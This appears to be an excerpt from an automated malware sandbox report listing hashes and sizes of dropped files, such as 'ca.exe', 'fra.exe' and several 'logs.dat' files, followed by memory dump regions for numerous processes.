SHA512205763906ce708e9962fb881d668695b0ba38b80c404e781ab9568b141e4df2bbbcf42150aca765922071689138eebf00833201ef80478f4217356d596aa84da
-
C:\Windows\Windows Display\logs.datFilesize
825B
MD5a1fc69efec6bbc5c91db4b62874475b4
SHA1605318891ba58ba749280d9c94257af93c9041f0
SHA256ce2a40a52252336f3f4ff594804eb4d89745336c3d6b168fe6ee16aad3ca05ea
SHA5123bb91a1450fcf6392ac498d81ecb6de17c67ec593c244b2aa8e9761d50d7b3b4eddb71ed5b750d867622325c11ab475237729e9ee9227b3fab83cc1d895d615b
-
C:\Windows\Windows Display\logs.datFilesize
890B
MD56db08b58c6e83881d7ebfa9be6b312aa
SHA1de53c681267d06cdae954f3654d03cd88808ba46
SHA256c5014e1153b4942b8c3fdfb2cdebd28b13030dc853f8dcace3c3e78d5215d0e3
SHA512d73b348737db68fc9dec33fb3d171e7d03a35b0b5596aa8025dfd629e3066578ac0abe13fc1dc7b0a085b637cc0ef382be6d053dc807078370078937289338b5
-
C:\Windows\Windows Display\logs.datFilesize
1KB
MD57adf94dfcd3c622f44fd2ae9609cb45c
SHA1c3e1f025983c762423281a7db596624aea65dd83
SHA25666bb3fd5b32b4c663ff770c972d410d4113f1b0537809232f3018ece90ad543b
SHA512fab94df842bebfca2f4a0a572edd23d312190d0670b3221fec51e665685613cbe655948cc1ee275f6cb35a61512417620ad4b33b936bd75d482337090f518c38
-
\Users\Admin\AppData\Local\Temp\a\ca.exeFilesize
504KB
MD509f00de26d78f36432ec4c736776d03c
SHA1e8b13aacdca1fd6a71735dc0a406b7e22a552251
SHA2569481382a3f7b57e43068571a3fbd242e48321f802b219fc09d32f76f30272ca6
SHA5127d1f1af65b22fef795e7224733a71edaa5aed0f1532dba1141b9cd5fa15479f93c4b5f0fdba413e7d753443176bde719e4fe2956a119ba85f256d75b8019cd2d
-
\Users\Admin\AppData\Local\Temp\a\ca.exeFilesize
504KB
MD509f00de26d78f36432ec4c736776d03c
SHA1e8b13aacdca1fd6a71735dc0a406b7e22a552251
SHA2569481382a3f7b57e43068571a3fbd242e48321f802b219fc09d32f76f30272ca6
SHA5127d1f1af65b22fef795e7224733a71edaa5aed0f1532dba1141b9cd5fa15479f93c4b5f0fdba413e7d753443176bde719e4fe2956a119ba85f256d75b8019cd2d
-
\Users\Admin\AppData\Local\Temp\a\fra.exeFilesize
436KB
MD54be7145eed15cc91886bf6da15df6e7d
SHA17fbbc379c1f6b71fa869cca66600e56ba5e78228
SHA256186edb45927e558b144a195c5aff382c7f884c08c36c80dff5a2c370bc4c0034
SHA512e86173c9dd7901b66cd61221ead7d037f0befd2597655d20600a82cd66cd9687707e8a69ac535d276c87320025dd5d0b8bf1def48b45e2b98c76e4b1eeb24072
-
\Users\Admin\AppData\Local\Temp\a\fra.exeFilesize
436KB
MD54be7145eed15cc91886bf6da15df6e7d
SHA17fbbc379c1f6b71fa869cca66600e56ba5e78228
SHA256186edb45927e558b144a195c5aff382c7f884c08c36c80dff5a2c370bc4c0034
SHA512e86173c9dd7901b66cd61221ead7d037f0befd2597655d20600a82cd66cd9687707e8a69ac535d276c87320025dd5d0b8bf1def48b45e2b98c76e4b1eeb24072
-
memory/1756-222-0x00000000054A0000-0x00000000054EC000-memory.dmpFilesize
304KB
-
memory/1756-115-0x0000000000310000-0x0000000000318000-memory.dmpFilesize
32KB
-
memory/1756-255-0x0000000004D60000-0x0000000004D70000-memory.dmpFilesize
64KB
-
memory/1756-254-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/1756-220-0x0000000005D50000-0x0000000005DC2000-memory.dmpFilesize
456KB
-
memory/1756-219-0x0000000005F50000-0x0000000005FD4000-memory.dmpFilesize
528KB
-
memory/1756-122-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/1756-126-0x0000000004D60000-0x0000000004D70000-memory.dmpFilesize
64KB
-
memory/1772-103-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/1772-42-0x0000000000730000-0x000000000081A000-memory.dmpFilesize
936KB
-
memory/1772-58-0x00000000052F0000-0x0000000005300000-memory.dmpFilesize
64KB
-
memory/1772-106-0x00000000052B0000-0x00000000052CE000-memory.dmpFilesize
120KB
-
memory/1772-47-0x0000000005610000-0x0000000005B0E000-memory.dmpFilesize
5.0MB
-
memory/1772-91-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/1772-61-0x00000000051D0000-0x00000000051DA000-memory.dmpFilesize
40KB
-
memory/1772-38-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/1772-54-0x0000000005050000-0x00000000050E2000-memory.dmpFilesize
584KB
-
memory/2140-34-0x00007FFF206D0000-0x00007FFF210BC000-memory.dmpFilesize
9.9MB
-
memory/2140-1-0x00007FFF206D0000-0x00007FFF210BC000-memory.dmpFilesize
9.9MB
-
memory/2140-2-0x0000000002690000-0x00000000026A0000-memory.dmpFilesize
64KB
-
memory/2140-40-0x0000000002690000-0x00000000026A0000-memory.dmpFilesize
64KB
-
memory/2140-0-0x0000000000520000-0x0000000000528000-memory.dmpFilesize
32KB
-
memory/2488-127-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/2488-65-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/2488-49-0x00000000005C0000-0x000000000061A000-memory.dmpFilesize
360KB
-
memory/2488-102-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/2488-41-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/2560-84-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/2560-107-0x0000000000BE0000-0x0000000000BE8000-memory.dmpFilesize
32KB
-
memory/2560-125-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/2560-114-0x0000000004980000-0x00000000049B8000-memory.dmpFilesize
224KB
-
memory/2560-108-0x0000000002380000-0x000000000239A000-memory.dmpFilesize
104KB
-
memory/2560-83-0x00000000000F0000-0x000000000014C000-memory.dmpFilesize
368KB
-
memory/2560-93-0x0000000004A60000-0x0000000004A70000-memory.dmpFilesize
64KB
-
memory/2948-262-0x00007FF6CA780000-0x00007FF6CACC6000-memory.dmpFilesize
5.3MB
-
memory/3360-270-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/3360-269-0x0000000000E10000-0x0000000000EB6000-memory.dmpFilesize
664KB
-
memory/3360-486-0x0000000005950000-0x0000000005960000-memory.dmpFilesize
64KB
-
memory/3360-473-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/3360-300-0x0000000005C40000-0x0000000005C4C000-memory.dmpFilesize
48KB
-
memory/3360-295-0x00000000059D0000-0x00000000059EC000-memory.dmpFilesize
112KB
-
memory/3360-282-0x0000000005950000-0x0000000005960000-memory.dmpFilesize
64KB
-
memory/3988-214-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/3988-181-0x0000000000720000-0x000000000077A000-memory.dmpFilesize
360KB
-
memory/3988-190-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/3988-271-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4076-223-0x000001A6DD5B0000-0x000001A6DD5D0000-memory.dmpFilesize
128KB
-
memory/4076-231-0x00007FF6D2330000-0x00007FF6D2E33000-memory.dmpFilesize
11.0MB
-
memory/4268-355-0x0000026874E90000-0x0000026874E92000-memory.dmpFilesize
8KB
-
memory/4268-337-0x0000026874880000-0x0000026874882000-memory.dmpFilesize
8KB
-
memory/4268-419-0x0000026877FA0000-0x00000268780A0000-memory.dmpFilesize
1024KB
-
memory/4268-459-0x0000026878900000-0x0000026878A00000-memory.dmpFilesize
1024KB
-
memory/4268-481-0x00000268798C0000-0x00000268799C0000-memory.dmpFilesize
1024KB
-
memory/4268-376-0x0000026875150000-0x0000026875152000-memory.dmpFilesize
8KB
-
memory/4268-424-0x0000026877FA0000-0x00000268780A0000-memory.dmpFilesize
1024KB
-
memory/4268-366-0x0000026875060000-0x0000026875062000-memory.dmpFilesize
8KB
-
memory/4268-330-0x0000026874E80000-0x0000026874E82000-memory.dmpFilesize
8KB
-
memory/4268-333-0x0000026875EF0000-0x0000026875EF2000-memory.dmpFilesize
8KB
-
memory/4268-334-0x00000268755E0000-0x0000026875600000-memory.dmpFilesize
128KB
-
memory/4268-362-0x0000026875000000-0x0000026875002000-memory.dmpFilesize
8KB
-
memory/4268-357-0x0000026874F60000-0x0000026874F62000-memory.dmpFilesize
8KB
-
memory/4268-348-0x0000026874BC0000-0x0000026874BC2000-memory.dmpFilesize
8KB
-
memory/4268-353-0x00000268775E0000-0x00000268775E2000-memory.dmpFilesize
8KB
-
memory/4396-241-0x0000000006120000-0x00000000061BC000-memory.dmpFilesize
624KB
-
memory/4396-342-0x0000000004EA0000-0x0000000004EB0000-memory.dmpFilesize
64KB
-
memory/4396-130-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4396-131-0x0000000004EA0000-0x0000000004EB0000-memory.dmpFilesize
64KB
-
memory/4396-242-0x00000000061C0000-0x0000000006226000-memory.dmpFilesize
408KB
-
memory/4396-256-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4396-261-0x0000000004EA0000-0x0000000004EB0000-memory.dmpFilesize
64KB
-
memory/4396-120-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/4396-227-0x0000000077D9F000-0x0000000077DA0000-memory.dmpFilesize
4KB
-
memory/4508-487-0x000001C8E3D60000-0x000001C8E3D61000-memory.dmpFilesize
4KB
-
memory/4508-483-0x000001C8E3CE0000-0x000001C8E3CE1000-memory.dmpFilesize
4KB
-
memory/4508-23-0x000001C8DEB20000-0x000001C8DEB30000-memory.dmpFilesize
64KB
-
memory/4508-48-0x000001C8DED20000-0x000001C8DED30000-memory.dmpFilesize
64KB
-
memory/4508-77-0x000001C8DDCE0000-0x000001C8DDCE2000-memory.dmpFilesize
8KB
-
memory/4556-518-0x00000000020A0000-0x00000000020FA000-memory.dmpFilesize
360KB
-
memory/4592-233-0x0000000000D60000-0x0000000000D76000-memory.dmpFilesize
88KB
-
memory/4592-336-0x0000000007AA0000-0x0000000007AB0000-memory.dmpFilesize
64KB
-
memory/4592-301-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4592-236-0x0000000007AA0000-0x0000000007AB0000-memory.dmpFilesize
64KB
-
memory/4592-232-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/5176-408-0x0000000000380000-0x0000000000492000-memory.dmpFilesize
1.1MB
-
memory/5176-413-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/5176-425-0x0000000005400000-0x0000000005500000-memory.dmpFilesize
1024KB
-
memory/5276-306-0x0000000005980000-0x0000000005990000-memory.dmpFilesize
64KB
-
memory/5276-298-0x0000000000E30000-0x0000000000F2A000-memory.dmpFilesize
1000KB
-
memory/5276-299-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/5424-490-0x0000000000090000-0x0000000000158000-memory.dmpFilesize
800KB